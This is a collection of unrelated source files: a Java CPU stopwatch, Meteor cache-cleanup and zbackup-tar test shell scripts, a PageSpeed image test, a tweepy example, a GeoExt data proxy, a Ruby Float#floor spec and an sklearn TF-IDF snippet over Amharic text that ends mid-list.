				formatJSON(c.result), formatJSON(string(out)))
		}
	}
}
|
<gh_stars>0
package io.github.brightloong.coding.interview.algorithms.utils; /******************************************************************************
* Compilation: javac StopwatchCPU.java
* Execution: none
* Dependencies: none
*
* A version of Stopwatch.java that measures CPU time on a single
* core or processor (instead of wall clock time).
*
******************************************************************************/
import java.lang.management.ThreadMXBean;
import java.lang.management.ManagementFactory;
/**
* The {@code StopwatchCPU} data type is for measuring
* the CPU time used during a programming task.
*
* See {@link Stopwatch} for a version that measures wall-clock time
* (the real time that elapses).
*
* @author <NAME>
* @author <NAME>
* @author <NAME>
*/
/**
 * The {@code StopwatchCPU} data type measures the CPU time consumed by the
 * current thread during a programming task (as opposed to wall-clock time).
 *
 * See {@link Stopwatch} for a version that measures the real time that
 * elapses instead.
 */
public class StopwatchCPU {
    /** JMX reports thread CPU time in nanoseconds; convert to seconds. */
    private static final double NANOSECONDS_PER_SECOND = 1000000000;

    private final ThreadMXBean cpuTimer;
    private final long startNanos;

    /**
     * Initializes a new stopwatch, capturing the calling thread's CPU time.
     */
    public StopwatchCPU() {
        cpuTimer = ManagementFactory.getThreadMXBean();
        startNanos = cpuTimer.getCurrentThreadCpuTime();
    }

    /**
     * Returns the elapsed CPU time (in seconds) since the stopwatch was created.
     *
     * @return elapsed CPU time (in seconds) since the stopwatch was created
     */
    public double elapsedTime() {
        final long nowNanos = cpuTimer.getCurrentThreadCpuTime();
        return (nowNanos - startNanos) / NANOSECONDS_PER_SECOND;
    }
}
|
#!/bin/bash
# Remove Meteor's local build artifacts and caches to force a clean build.
# The local database (.meteor/local/db) is deliberately left untouched.

# Abort if the directory is missing: otherwise the rm loop below would run
# relative to whatever the current working directory happens to be.
cd .meteor/local || exit 1

## declare an array variable
#declare -a files=("build" "bundler-cache" "cordova-build" "isopacks" "plugin-cache" "shell")
# we do not delete cordova-build/plugins as it takes long to download; skipping it speeds up the build
declare -a files=("build" "bundler-cache" "isopacks" "shell" \
"cordova-build/" \
# "cordova-build/hooks" "cordova-build/platforms" "cordova-build/resources" \
# "cordova-build/www cordova-build/config.xml"
)

# we delete everything but not the local database ".meteor/local/db"
## now loop through the above array
for dir in "${files[@]}"
do
    echo "removing" "$dir"
    # Quote the expansion so a path containing spaces cannot be split into
    # multiple rm arguments.
    rm -rf "$dir"
    #ls -1 "$dir"
done
|
#!/bin/bash
#
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# With inline_images disabled, both images should get srcset attributes.
test_filter responsive_images,rewrite_images,-inline_images adds srcset for \
Puzzle.jpg and Cuppa.png
# Expect three srcset attributes across the page.
fetch_until $URL 'grep -c srcset=' 3
# Make sure all Puzzle URLs are rewritten.
fetch_until -save $URL 'grep -c [^x]Puzzle.jpg' 0
check egrep -q 'xPuzzle.jpg.pagespeed.+srcset="([^ ]*images/([0-9]+x[0-9]+)?xPuzzle.jpg.pagespeed.ic.[0-9a-zA-Z_-]+.jpg [0-9.]+x,?)+"' $FETCH_FILE
# Make sure all Cuppa URLs are rewritten.
fetch_until -save $URL 'grep -c [^x]Cuppa.png' 0
check egrep -q 'xCuppa.png.pagespeed.+srcset="([^ ]*images/([0-9]+x[0-9]+)?xCuppa.png.pagespeed.ic.[0-9a-zA-Z_-]+.png [0-9.]+x,?)+"' $FETCH_FILE
# With inline_images enabled, the small image gets inlined instead.
test_filter responsive_images,rewrite_images,+inline_images adds srcset for \
Puzzle.jpg, but not Cuppa.png
# Cuppa.png will be inlined, so we should not get a srcset for it.
fetch_until $URL 'grep -c Cuppa.png' 0 # Make sure Cuppa.png is inlined.
fetch_until $URL 'grep -c srcset=' 2 # And only two srcsets (for Puzzle.jpg).
# Make sure all Puzzle URLs are rewritten.
fetch_until -save $URL 'grep -c [^x]Puzzle.jpg' 0
check egrep -q 'xPuzzle.jpg.pagespeed.+srcset="([^ ]*images/([0-9]+x[0-9]+)?xPuzzle.jpg.pagespeed.ic.[0-9a-zA-Z_-]+.jpg [0-9.]+x,?)+"' $FETCH_FILE
start_test rewrite_images can rewrite srcset itself
URL=$TEST_ROOT/image_rewriting/srcset.html?PageSpeedFilters=+rewrite_images,+debug
fetch_until -save $URL 'grep -c xPuzzle.*1x.*xCuppa.*2x' 1
|
import tweepy

# Set up API access for your application.
# NOTE(review): these are placeholders -- real credentials should come from
# environment variables or a secrets store, never from source code.
consumer_key = "<your_consumer_key>"
consumer_secret = "<your_consumer_secret>"
access_token = "<your_access_token>"
access_token_secret = "<your_access_token_secret>"

# Create the API access object (OAuth 1.0a user context).
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)

# Get the user's timeline (the 5 most recent tweets).
# NOTE(review): 'username' is a placeholder screen name; confirm the
# positional argument matches the signature of the installed tweepy version.
user_timeline = api.user_timeline('username', count=5)

# Print the text of each tweet.
for tweet in user_timeline:
    print(tweet.text)
<reponame>KaiVolland/geoext2<filename>src/GeoExt/data/proxy/Protocol.js<gh_stars>0
/*
* Copyright (c) 2008-2015 The Open Source Geospatial Foundation
*
* Published under the BSD license.
* See https://github.com/geoext/geoext2/blob/master/license.txt for the full
* text of the license.
*/
/*
* @requires GeoExt/Version.js
*/
/**
* A data proxy for use with OpenLayers.Protocol objects.
*
* @class GeoExt.data.proxy.Protocol
*/
Ext.define('GeoExt.data.proxy.Protocol', {
    extend: 'Ext.data.proxy.Server',
    requires: [
        'GeoExt.Version'
    ],
    alias: 'proxy.gx_protocol',
    config: {
        /**
         * The protocol used to fetch features.
         *
         * @cfg {OpenLayers.Protocol}
         */
        protocol: null,
        /**
         * Abort any previous request before issuing another.
         *
         * @cfg {Boolean}
         */
        abortPrevious: true,
        /**
         * Should options.params be set directly on options before passing it
         * into the protocol's read method?
         *
         * @cfg {Boolean}
         */
        setParamsAsOptions: false,
        /**
         * The reader to use.
         *
         * @cfg {Ext.data.reader.Reader}
         */
        reader: {}
    },
    /**
     * We need to override this as the OpenLayers classes passed as configs
     * loose their class-nature and seem to be copied by ExtJS somewhere.
     *
     * We deal with this elsewhere in a different manner and should see if
     * we can either share code or get rid of this special handling all
     * together. The problem isn't reproducible for other 'classes' with a
     * similar inheritance strategy as OpenLayers 2 has.
     *
     * TODO Find a way to have this functionality shared or get rid of it.
     *
     * @param {Object} config the configuration as passed by the user.
     */
    initConfig: function(config){
        var me = this,
            cfg = config || {},
            prefix = me.$configPrefixed ? '_' : '',
            olConfigs = [
                'protocol'
            ];
        // Move OpenLayers instances out of the config object and assign them
        // directly on the proxy, so Ext's config system never clones them.
        Ext.each(olConfigs, function(olConfig){
            if (cfg[olConfig]) {
                me[prefix + olConfig] = cfg[olConfig];
                delete cfg[olConfig];
            }
        });
        me.callParent([cfg]);
    },
    model: 'Ext.data.Model',
    /**
     * The response returned by the read call on the protocol.
     *
     * @property {OpenLayers.Protocol.Response}
     * @private
     */
    response: null,
    /**
     * Send the request.
     *
     * @param {Ext.data.Operation} operation The Ext.data.Operation object.
     * @param {Function} callback The callback function to call when the
     * operation has completed.
     * @param {Object} scope The scope in which to execute the callback.
     * @private
     */
    doRequest: function(operation, callback, scope) {
        var me = this,
            operationParams,
            params,
            request,
            o,
            cb,
            options;
        // Ext 5 moved callback/scope/params behind accessors on the
        // operation; Ext 4 exposes them as plain properties.
        if(GeoExt.isExt5){
            callback = callback || operation.getCallback();
            scope = scope || operation.getScope();
            operationParams = operation.getParams() || {};
        } else {
            operationParams = operation.params || {};
        }
        params = Ext.applyIf(operationParams, me.extraParams || {});
        //copy any sorters, filters etc into the params so they can be sent over
        //the wire
        params = Ext.applyIf(params, me.getParams(operation));
        // Context object handed to loadResponse so it can finish the
        // operation and invoke the caller's callback.
        o = {
            params: params || {},
            operation: operation,
            request: {
                callback: callback,
                scope: scope,
                arg: operation.arg || operation.config.arg
            },
            reader: me.getReader()
        };
        cb = OpenLayers.Function.bind(me.loadResponse, me, o);
        if (me.getAbortPrevious()) {
            me.abortRequest();
        }
        options = {
            params: params,
            callback: cb,
            scope: me
        };
        Ext.applyIf(options, operation.arg || operation.config.arg);
        // Optionally flatten params onto the options object, as some
        // OpenLayers protocols expect them there rather than nested.
        if (me.getSetParamsAsOptions() === true) {
            Ext.applyIf(options, options.params);
            delete options.params;
        }
        me.response = me.getProtocol().read(options);
    },
    /**
     * Called to abort any ongoing request.
     *
     * @private
     */
    abortRequest: function() {
        var me = this;
        if (me.response) {
            me.getProtocol().abort(me.response);
            me.response = null;
        }
    },
    /**
     * Handle response from the protocol.
     *
     * @param {Object} o
     * @param {OpenLayers.Protocol.Response} response
     * @private
     */
    loadResponse: function(o, response) {
        var me = this,
            operation = o.operation,
            scope = o.request.scope,
            callback = o.request.callback,
            result;
        if (response.success()) {
            result = o.reader.read(response.features || response);
            Ext.apply(operation, {
                response: response,
                resultSet: result
            });
            // Record-attachment API differs between Ext 4 and Ext 5.
            if (GeoExt.isExt4) {
                operation.commitRecords(result.records);
            } else {
                operation.setRecords(result.records);
            }
            operation.setCompleted();
            operation.setSuccessful();
        } else {
            me.setException(operation, response);
            me.fireEvent('exception', this, response, operation);
        }
        if (typeof callback == 'function') {
            callback.call(scope || me, operation);
        }
    }
});
|
#!/bin/bash
#
# Ensure zbackup-tar is in your path:
# export PATH=$PATH:/home/david/Projects/zbackup-tar
#
# Usage:
# test.sh /home/david/Projects/zbackup-tar/tests/testdata
# Resolve this script's absolute location so helper files can be sourced
# relative to it, regardless of the caller's working directory.
SCRIPTNAME=`readlink -f $0`
export FUNCTIONROOT=`dirname $SCRIPTNAME`
# All stores/restores happen under TMPDIR; TESTDATA (first positional
# argument) is the tree being backed up.
export TMPDIR=/tmp/zbackup-tar/
export TESTDATA=$1
# Default number of refresh cycles passed to zbackup-tar create.
REFRESHCYCLES=5
TODO_BUG=1
# Presumably defines logResult, checkForSuccess/checkForFailure,
# backupAndRestoreDir, sleepAvoidCollision, longSleep used below — confirm.
source $FUNCTIONROOT/test_Functions.sh
# Test 1: first full backup of TESTDATA plus a round-trip restore.
function test1 ()
{
    logResult "######## Backup 1 - Initial Backup ########"
    backupAndRestoreDir "" backup01.tar
    sleepAvoidCollision
}
# Test 1 (encrypted): the same round trip against a password-protected store.
function test1Encrypted ()
{
    logResult "######## Backup 1 Encrypted - Encrypted backups ########"
    echo mypassword > $TMPDIR/password
    zbackup init --password-file $TMPDIR/password $TMPDIR/zbackup_encrypted/
    zbackup-tar create --zbackupArgs "--password-file $TMPDIR/password" --previousBackup "" --newBackup $TMPDIR/zbackup_encrypted/backups/backup01.tar $TESTDATA/
    checkForSuccess "SUCCESS $BACKUPNAME backed up" "FAIL zbackup-tar failed"
    cd $TMPDIR/restored/
    rm -rf $TMPDIR/restored/*
    zbackup-tar restore --zbackupArgs "--password-file $TMPDIR/password" --backup $TMPDIR/zbackup_encrypted/backups/backup01.tar
    checkForSuccess "SUCCESS $BACKUPNAME restored" "FAIL zbackup-tar restore failed"
    diff -rq --no-dereference $TESTDATA/ $TMPDIR/restored/
    checkForSuccess "SUCCESS $BACKUPNAME is the same" "FAIL Restoring $BACKUPNAME"
}
# Test 1 (same dir): back up using '.' as the source from inside TESTDATA,
# instead of an absolute path.
function test1SameDir ()
{
    logResult "######## Backup 1 - Same Dir ########"
    BACKUPNAME=backup01_samedir.tar
    cd $TESTDATA/
    echo "I am now in " `pwd`
    zbackup-tar create --previousBackup "" --newBackup $TMPDIR/zbackup/backups/$BACKUPNAME .
    checkForSuccess "SUCCESS $BACKUPNAME backed up" "FAIL zbackup-tar failed"
    cd $TMPDIR/restored/
    rm -rf $TMPDIR/restored/*
    zbackup-tar restore --backup $TMPDIR/zbackup/backups/$BACKUPNAME
    checkForSuccess "SUCCESS $BACKUPNAME restored" "FAIL zbackup-tar restore failed"
    restoreAndCheck
    sleepAvoidCollision
}
# Test 2: back up with no changes; with REFRESHCYCLES=0 the new manifest
# must match the previous one apart from its first (header) line.
function test2 ()
{
    logResult "######## Backup 2 - No Changes ########"
    export REFRESHCYCLES=0
    backupAndRestoreDir backup01.tar backup02.tar
    export REFRESHCYCLES=5
    diff <(tail -n +2 /tmp/backup01.tar.manifest) <(tail -n +2 /tmp/backup02.tar.manifest)
    checkForSuccess "SUCCESS Backup manifest 1 and 2 are identical" "FAIL manifest 1 and 2 are different"
    sleepAvoidCollision
}
# Test 3: an added file is picked up by the incremental backup.
function test3 ()
{
    logResult "######## Backup 3 - A New File ########"
    date > $TESTDATA/file.txt
    backupAndRestoreDir backup02.tar backup03.tar
    sleepAvoidCollision
}
# Test 4: modified files are picked up by the incremental backup.
function test4 ()
{
    logResult "######## Backup 4 - Changed Files ########"
    date > $TESTDATA/file.txt
    date > $TESTDATA/folder2/file.txt
    backupAndRestoreDir backup03.tar backup04.tar
    sleepAvoidCollision
}
# Test 5: deleted files disappear from the incremental backup.
function test5 ()
{
    logResult "######## Backup 5 - Removed Files ########"
    find $TESTDATA -name "*.txt" -print0 | xargs -0 rm -v
    backupAndRestoreDir backup04.tar backup05.tar
    sleepAvoidCollision
}
# Test 5b: file ownership/permission round trip, run under fakeroot so the
# helper script can create files as arbitrary users without real root.
function test5b ()
{
    logResult "######## Backup 5b - File permissions ########"
    fakeroot -u $FUNCTIONROOT//test_Fakeroot.sh
    # The helper is expected to dump the two permission listings compared here.
    diff /tmp/test5b.testdata.perms /tmp/test5b.restored.perms
    checkForSuccess "SUCCESS Permissions match" "FAIL Permissions do not match"
    sleepAvoidCollision
}
# Test 6: move the whole zbackup store to a new location and verify a
# restore from the moved store still reproduces TESTDATA exactly.
function test6 ()
{
    logResult "######## Test 6 - Moving the backup ########"
    export BACKUP=06
    backupAndRestoreDir backup05b.tar backup$BACKUP.tar
    mkdir -pv $TMPDIR/foo/bar/
    mv $TMPDIR/zbackup $TMPDIR/foo/bar/
    echo Restore backup $BACKUP
    cd $TMPDIR/restored/
    zbackup-tar restore --backup $TMPDIR/foo/bar/zbackup/backups/backup$BACKUP.tar
    echo Checking backup $BACKUP
    diff -rq $TESTDATA/ $TMPDIR/restored/
    # Fix: failure message typo ("differente" -> "different").
    checkForSuccess "SUCCESS $BACKUP is the same" "FAIL $BACKUP is different"
    # Put the store back so subsequent tests find it in the usual place.
    mv $TMPDIR/foo/bar/zbackup $TMPDIR/
    sleepAvoidCollision
}
# Test 7: restoring must fail cleanly (non-zero exit) when the store's
# index directory is unreadable; permissions are restored afterwards.
function test7 ()
{
    logResult "######## Test 7 - Handling errors ########"
    export BACKUP=07
    backupAndRestoreDir backup06.tar backup$BACKUP.tar
    chmod gou-rwx /tmp/zbackup-tar/zbackup/index/
    # Fix: echo message typo ("remiving" -> "removing").
    echo Restore backup $BACKUP AFTER removing permissions
    cd $TMPDIR/restored/
    zbackup-tar restore --backup $TMPDIR/zbackup/backups/backup$BACKUP.tar
    checkForFailure "FAIL - backup should have FAILED $BACKUP" "SUCCESS Restoring the backup returned a non-0 error code"
    # Copy the bundles directory's permissions back onto index/.
    chmod --reference=/tmp/zbackup-tar/zbackup/bundles /tmp/zbackup-tar/zbackup/index/
    sleepAvoidCollision
}
# Test 8: re-add txt files so test 9 has something to exclude.
function test8 ()
{
    logResult "######## Backup 8 - Add txt files ########"
    date > $TESTDATA/file.txt
    date > $TESTDATA/folder2/file.txt
    backupAndRestoreDir backup07.tar backup08.tar
    sleepAvoidCollision
}
# Test 9: --exclude "*.txt" must drop txt files from the backup; the restore
# differs from TESTDATA until the excluded files are deleted from the source.
function test9 ()
{
    logResult "######## Backup 9 - Exclude txt files ########"
    export BACKUP=09
    rm -rf $TMPDIR/restored/*
    date > $TESTDATA/file.txt
    echo Initial backup $BACKUP
    zbackup-tar create --previousBackup $TMPDIR/zbackup/backups/backup08.tar --newBackup $TMPDIR/zbackup/backups/backup$BACKUP.tar --refreshCycles 5 --exclude "*.txt" $TESTDATA/
    echo Restore backup $BACKUP
    cd $TMPDIR/restored/
    zbackup-tar restore --backup $TMPDIR/zbackup/backups/backup$BACKUP.tar
    zbackup restore --silent $TMPDIR/zbackup/backups/backup$BACKUP.tar.manifest > /tmp/backup$BACKUP.tar.manifest
    echo Checking backup $BACKUP
    diff -rq --no-dereference $TESTDATA/ $TMPDIR/restored/
    checkForFailure "FAIL txt files should be different" "SUCCESS backup $BACKUP is different"
    # Once the txt files are removed from the source, both trees must match.
    find $TESTDATA/ -name "*.txt" -print0 | xargs -0 rm -v
    diff -rq --no-dereference $TESTDATA/ $TMPDIR/restored/
    checkForSuccess "SUCCESS After removing txt files, backup should be the same" "FAIL backup files were different"
    sleepAvoidCollision
}
# Test 9b: multiple --exclude patterns at once (*.txt, *.exclude and the
# excludedir/ directory) must all be honored in a single backup.
function test9b ()
{
    logResult "######## Backup 9b - Exclude multiple extensions ########"
    export BACKUP=09b
    rm -rf $TMPDIR/restored/*
    mkdir -v $TESTDATA/excludedir/
    date > $TESTDATA/file.txt
    date > $TESTDATA/file.exclude
    date > $TESTDATA/excludedir/test.sh
    echo Initial backup $BACKUP
    zbackup-tar create --previousBackup $TMPDIR/zbackup/backups/backup08.tar --newBackup $TMPDIR/zbackup/backups/backup$BACKUP.tar --refreshCycles 5 --exclude "*.txt" --exclude "*.exclude" --exclude "excludedir/" $TESTDATA/
    echo Restore backup $BACKUP
    cd $TMPDIR/restored/
    zbackup-tar restore --backup $TMPDIR/zbackup/backups/backup$BACKUP.tar
    zbackup restore --silent $TMPDIR/zbackup/backups/backup$BACKUP.tar.manifest > /tmp/backup$BACKUP.tar.manifest
    echo Checking backup $BACKUP
    diff -rq --no-dereference $TESTDATA/ $TMPDIR/restored/
    checkForFailure "FAIL txt files should be different" "SUCCESS backup $BACKUP is different"
    # Delete everything the backup was told to exclude; the trees must then match.
    find $TESTDATA/ -name "*.txt" -print0 | xargs -0 rm -v
    find $TESTDATA/ -name "*.exclude" -print0 | xargs -0 rm -v
    find $TESTDATA/ -name "excludedir" -print0 | xargs -0 rm -rfv
    diff -rq --no-dereference $TESTDATA/ $TMPDIR/restored/
    # Fix: the success message referred to ",v and subdir1/" (copy-paste from
    # another test); it now names what this test actually excludes.
    checkForSuccess "SUCCESS After removing txt, exclude files and excludedir/, backup should be the same" "FAIL backup files were different"
    sleepAvoidCollision
}
# Test 10: excluding a directory pattern ("subfolder1/"); every remaining
# difference between source and restore must mention subfolder1.
function test10 ()
{
    logResult "######## Backup 10 - Exclude subfolder1/ files ########"
    export BACKUP=10
    rm -rf $TMPDIR/restored/*
    echo Initial backup $BACKUP
    zbackup-tar create --previousBackup $TMPDIR/zbackup/backups/backup09.tar --newBackup $TMPDIR/zbackup/backups/backup$BACKUP.tar --refreshCycles 5 --exclude "subfolder1/" $TESTDATA/
    echo Restore backup $BACKUP
    cd $TMPDIR/restored/
    zbackup-tar restore --backup $TMPDIR/zbackup/backups/backup$BACKUP.tar
    zbackup restore --silent $TMPDIR/zbackup/backups/backup$BACKUP.tar.manifest > /tmp/backup$BACKUP.tar.manifest
    echo Checking backup $BACKUP
    diff -rq --no-dereference $TESTDATA/ $TMPDIR/restored/ > /tmp/backup$BACKUP.diff
    checkForFailure "FAIL txt files should be different" "SUCCESS backup $BACKUP is different"
    # grep -v exits non-zero when every diff line mentions subfolder1 —
    # i.e. nothing else differed.
    grep -v subfolder1 /tmp/backup$BACKUP.diff
    checkForFailure "FAIL There should be no lines not matching subfolder1/" "SUCCESS backup is the same after excluding subfolder1/"
    sleepAvoidCollision
}
# Test 11: creating a backup must fail cleanly while the index directory is
# unreadable, then succeed once permissions are restored.
function test11 ()
{
    logResult "######## Test 11 - Handling errors backing up ########"
    export BACKUP=11
    chmod gou-rwx /tmp/zbackup-tar/zbackup/index/
    zbackup-tar create --previousBackup $TMPDIR/zbackup/backups/backup10.tar --newBackup $TMPDIR/zbackup/backups/backup$BACKUP.tar --refreshCycles 5 $TESTDATA/
    checkForFailure "FAIL - backup should have FAILED $BACKUP" "SUCCESS Storing the backup returned a non-0 error code"
    chmod --reference=/tmp/zbackup-tar/zbackup/bundles /tmp/zbackup-tar/zbackup/index/
    zbackup-tar create --previousBackup $TMPDIR/zbackup/backups/backup10.tar --newBackup $TMPDIR/zbackup/backups/backup$BACKUP.tar --refreshCycles 5 $TESTDATA/
    checkForSuccess "SUCCESS - backup should have SUCCEEDED $BACKUP" "FAIL Backing up returned a non-0 error code"
    sleepAvoidCollision
}
# Test 12: stdout of a create run must match the stored sample output.
function test12 ()
{
    logResult "######## Test 12 - Ensuring backup output ########"
    export BACKUP=12
    date > $TESTDATA/file.txt
    date > $TESTDATA/folder2/file.txt
    touch $TESTDATA/document.pdf
    # Extend maxAge so we don't freshen any files
    zbackup-tar create --previousBackup $TMPDIR/zbackup/backups/backup11.tar --newBackup $TMPDIR/zbackup/backups/backup$BACKUP.tar $TESTDATA/ > /tmp/backup$BACKUP.stdout
    diff -w /tmp/backup$BACKUP.stdout $TESTDATA/../results/backup$BACKUP.stdout
    checkForSuccess "SUCCESS - Output should be the same $BACKUP" "FAILURE Output is not the same as the sample"
    sleepAvoidCollision
}
# Expected output is:
# fileX EXTRACTED from backups/blah.tar
# fileY EXTRACTED from backups/blahX.tar
# where backupNN.tar is the tar file where the file resides.
# The files are listed on the order they are extracted, so they should be listed clustered by tarfile and then in the order they were tarred
# Test 13: restore stdout, after sorting and masking the backup numbers,
# must match the stored sample output.
function test13 ()
{
    logResult "######## Test 13 - Ensuring restore output ########"
    export BACKUP=13
    backupAndRestoreDir backup12.tar backup13.tar
    cd $TMPDIR/restored/
    rm -rf $TMPDIR/restored/*
    zbackup-tar restore --backup $TMPDIR/zbackup/backups/backup$BACKUP.tar > /tmp/backup$BACKUP.stdout
    # Sort the output of the command by filename, since the output is NOT sorted
    sort /tmp/backup$BACKUP.stdout | sed -e "s/backup[0-9][0-9].tar/backupNN.tar/g" > /tmp/backup$BACKUP.stdout.massaged
    diff -w /tmp/backup$BACKUP.stdout.massaged $TESTDATA/../results/backup$BACKUP.stdout
    checkForSuccess "SUCCESS - Output should be the same $BACKUP" "FAILURE Output is not the same as the sample"
    sleepAvoidCollision
}
# Test 14: partial restore of a directory — folder1/ comes back intact,
# folder2/ must not be restored at all.
function test14 ()
{
    logResult "######## Test 14 - Partial restores - directories ########"
    export BACKUP=14
    backupAndRestoreDir backup13.tar backup$BACKUP.tar
    cd $TMPDIR/restored/
    rm -rf $TMPDIR/restored/*
    zbackup-tar restore --backup $TMPDIR/zbackup/backups/backup$BACKUP.tar folder1/
    diff -rq --no-dereference $TESTDATA/folder1/ $TMPDIR/restored/folder1/
    checkForSuccess "SUCCESS - folder1 is the same" "FAILURE folder1 is different"
    if [ -d "$TMPDIR/restored/folder2" ]; then
        logFailResult "FAIL folder2 should not have been restored"
        exit 1
    else
        logResult "SUCCESS folder2 was not restored"
    fi
    sleepAvoidCollision
}
# Test 15: partial restore of a single file; the resulting file list must
# match the stored sample.
function test15 ()
{
    logResult "######## Test 15 - Partial restores - files ########"
    export BACKUP=15
    backupAndRestoreDir backup14.tar backup$BACKUP.tar
    cd $TMPDIR/restored/
    rm -rf $TMPDIR/restored/*
    zbackup-tar restore --backup $TMPDIR/zbackup/backups/backup$BACKUP.tar file.txt
    find -type f | sort > /tmp/backup$BACKUP.list
    diff -wB /tmp/backup$BACKUP.list $TESTDATA/../results/backup$BACKUP.list
    checkForSuccess "SUCCESS - files are the same" "FAILURE files are different"
    sleepAvoidCollision
}
# Test 16: symlinks — one dangling, one valid — must survive the round trip.
function test16 ()
{
    logResult "######## Test 16 - links (broken and working) ########"
    export BACKUP=16
    ln -sT /dev/broken $TESTDATA/broken.link
    ln -sT /etc/init.d $TESTDATA/initd.link
    backupAndRestoreDir backup15.tar backup$BACKUP.tar
    find $TESTDATA -name "*.link" -print0 | xargs -0 rm -v
    sleepAvoidCollision
}
# testSleep PREV NEW: wait a minute so files become stale, back up again,
# and require the manifest to have changed (files were re-freshened).
function testSleep ()
{
    PREVBACKUP=$1
    BACKUP=$2
    logResult "######## Backup $BACKUP / $PREVBACKUP - Sleep for 1 mins ########"
    longSleep 60 "To freshen files"
    backupAndRestoreDir backup$PREVBACKUP.tar backup$BACKUP.tar
    diff /tmp/backup$PREVBACKUP.tar.manifest /tmp/backup$BACKUP.tar.manifest
    checkForFailure "FAIL Manifests are identical, should have been reloaded" "SUCCESS Manifest has changed"
    sleepAvoidCollision
}
echo Executing Unit Tests in $FUNCTIONROOT
# Start from a clean slate: drop files left behind by earlier runs.
find $TESTDATA -name "*.txt" -print0 | xargs -0 rm -v
find $TESTDATA -name "*.link" -print0 | xargs -0 rm -v
mkdir -v $TESTDATA/empty
# Restore index permissions in case test7/test11 aborted mid-run previously.
chmod --reference=/tmp/zbackup-tar/zbackup/bundles /tmp/zbackup-tar/zbackup/index/
rm -rf $TMPDIR
mkdir -pv $TMPDIR/zbackup $TMPDIR/restored
zbackup init --non-encrypted $TMPDIR/zbackup/
# Run the tests in order; later tests chain off earlier tests' backups.
test1
test1SameDir
test1Encrypted
test2
test3
test4
test5
test5b
test6
test7
test8
test9
test9b
test10
test11
test12
test13
test14
test15
test16
LASTTEST=16
# Three more backups spaced a minute apart to force file freshening.
for i in `seq 1 3`; do
    PREVBACKUP=$((LASTTEST + i - 1))
    BACKUP=$((LASTTEST + i))
    testSleep $PREVBACKUP $BACKUP
done;
# After the freshen cycles no file should still reference the first backup.
grep backup01 /tmp/backup$BACKUP.tar.manifest
checkForFailure "FAIL backup01 is in use" "SUCCESS backup01 is no longer in use"
find $TESTDATA -name "*.txt" -print0 | xargs -0 rm -v
|
python transformers/examples/language-modeling/run_language_modeling.py --model_name_or_path train-outputs/1024+0+512-rare/model --tokenizer_name model-configs/1536-config --eval_data_file ../data/wikitext-103-raw/wiki.valid.raw --output_dir eval-outputs/1024+0+512-rare/512+512+512-shuffled-N-1 --do_eval --per_device_eval_batch_size 1 --dataloader_drop_last --augmented --augmentation_function shuffle_remove_all_but_nouns_first_third_full --eval_function last_element_eval |
<filename>ruby/spec/ruby/core/float/floor_spec.rb
require File.expand_path('../../../spec_helper', __FILE__)
describe "Float#floor" do
  it "returns the largest Integer less than or equal to self" do
    # floor rounds toward negative infinity, so -1.2 -> -2 (not -1)
    -1.2.floor.should eql( -2)
    -1.0.floor.should eql( -1)
    0.0.floor.should eql( 0 )
    1.0.floor.should eql( 1 )
    5.9.floor.should eql( 5 )
    # boundary values around the signed 64-bit integer range
    -9223372036854775808.1.floor.should eql(-9223372036854775808)
    +9223372036854775808.1.floor.should eql(+9223372036854775808)
  end
  ruby_version_is "2.4" do
    it "returns the largest number less than or equal to self with an optionally given precision" do
      # positive ndigits keeps decimal places (Float result);
      # ndigits <= 0 floors to an Integer at that power of ten
      2.1679.floor(0).should eql(2)
      214.94.floor(-1).should eql(210)
      7.0.floor(1).should eql(7.0)
      -1.234.floor(2).should eql(-1.24)
      5.123812.floor(4).should eql(5.1238)
    end
  end
end
|
import pandas as pd
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.feature_extraction.text import CountVectorizer
# this is a very toy example, do not try this at home unless you want to
# understand the usage differences between fit/transform on these classes

# English toy corpus (kept for comparison; only docs2 is vectorized below).
docs1 = ["the house had a tiny little mouse",
         "the cat saw the mouse",
         "the mouse ran away from the house",
         "the cat finally ate the mouse",
         "the end of the mouse story"
         ]

# Amharic corpus actually used for the TF-IDF demonstration.
docs2 = ["የኢትዮጵያ ቤት ኪንግ ፕሪሚዬር ሊግ አሸናፊው ፋሲል ከነማ ትናንት በአዲስ አበባ ሸራተን አዲስ ሆቴል የገቢ ማሰባሰቢያ ቴሌቶን ማዘጋጀቱ ይታወሳል",
         "በገቢ ማሰባሰቢያ ዝግጅቱ ከፍተኛ የመንግሥት የሥራ ኃላፊዎችን ጨምሮ የተለያዩ የኅብረተሰብ ክፍሎች ተሳትፈዋል፡፡ ስለ ተደረገው የገቢ ማሰባሰቢያ ቴሌቶን መግለጫ የሰጡት የክለቡ ፕሬዚዳንትና የጎንደር ከተማ ከንቲባ አቶ ሞላ መልካሙ ቴሌቶኑ ኢትዮጵያዊነት አምሮና ደምቆ የታየበትና የስፖርት ዓላማን ያሳካ ነበር ብለዋል",
         # fix: a missing trailing comma here silently concatenated this
         # document with the next one, shrinking the corpus by one document
         "በቴሌቶኑ አሁንም በስልክና በተለያዩ አማራጮች ቃል የሚገቡ እንዳሉ ሆኖ ከ170 ሚሊዮን ብር በላይ መሰብሰቡም ተገልጿል",
         "ቀዳማዊት እመቤት ዝናሽ ታያቸው በሁሉም ክልሎች የክለቡ አምባሳደሮች መሰየማቸው ፋሲል ከነማ የኢትዮጵያ ክለብ መሆኑን የሚገልጽ ነው ብለዋል። በቴሌቶኑ ከሁሉም የኢትዮጵያ ክፍሎች ድጋፎች መደረጋቸው ሌላኛው ፍሲል የኢትዮጵያ ክለብ መሆኑን የሚያሳይ እንደሆነ ተናግረዋል። በድጋፉ ለተሳተፉ ሁሉም አካላት ምስጋናም አቅርበዋል",
         "በቀጣይ ክለቡ የያዛቸውን ትላልቅ ፕሮጀክቶች ከግብ ለማድረስና ክለቡ በአፍሪካ መድረክ ረዥም ርቀት እንዲጓዝ አሁንም የሁሉም ድጋፍ ያስፈልጋል ተብሏል።",
